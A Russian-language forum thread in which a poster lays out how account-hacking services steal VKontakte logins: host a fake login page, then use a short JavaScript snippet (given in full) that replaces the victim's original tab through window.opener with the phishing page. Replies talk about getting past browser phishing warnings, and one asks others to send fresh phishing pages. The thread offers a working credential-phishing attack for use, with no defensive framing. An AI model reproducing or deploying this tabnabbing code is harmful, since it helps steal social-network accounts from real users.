Satanist 83 2 дня назад увидел пару человек , которые предоставляют услуги по взлому аккаунтов в социальной сети ВКонтакте. Я решил провести тест , и не пожалев денег заказал услугу по взлому собственной страницы. Человек добавил меня , и скинул ссылку якобы на мою фотографию (домен был не бесплатный) , я перешёл и увидел что родительская вкладка была заменена на фейковую , и после чего мне выдало окно авторизации ВКонтакте. Здесь все становиться ясно , и ниже я если можно так сказать "солью" способ взлома. ------------------------------------------------------------------------------------ 1. Регистрируем любой хостинг аккаунт (можно и с бесплатным доменом). 2. Далее закидаем фейковую страницу в корень , и после чего создаем файл window.htm (можете использовать любое название). 3. Открываем наш только созданный файл через редактор , и пишем следующий код: <html> <head> <title></title> </head> <body> <script language="JavaScript"> if(parent.window.opener) parent.window.opener.location.replace("http://fent.in"); // Ссылка на фейк. document.location.href = "http://fent.in"; // Ссылка для отводки глаз жертвы. </script> </body> </html> Готово ! По данному принципу работает множество "взломщиков". Пользуемся 4 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
CharlesBukowski 28 Пользовался я таким фейком, но изначально он срабатывал не в каждом браузере, а затем Хромом и Мозиллой выдавалось сообщение, что это фишинговый сайт. Сомневаюсь, что этот способ на данный момент времени актуален. Кроме того говорят, что гиперссылка не работает, не открывается вторая вкладка, потому что opera и chrome убрали данную функцию... 3 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Konfigyrat 53 Пользовался я таким фейком, но изначально он срабатывал не в каждом браузере, а затем Хромом и Мозиллой выдавалось сообщение, что это фишинговый сайт. Сомневаюсь, что этот способ на данный момент времени актуален. Кроме того говорят, что гиперссылка не работает, не открывается вторая вкладка, потому что opera и chrome убрали данную функцию... В паблике не найдешь решение проблемы этой,Это ведь хлеб.Здесь главное обойти чтобы браузеры не ругались 2 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах
Skim 49 Не откажусь от свежего фейка,если есть у кого в личку кидайте! 2 Поделиться сообщением Ссылка на сообщение Поделиться на других сайтах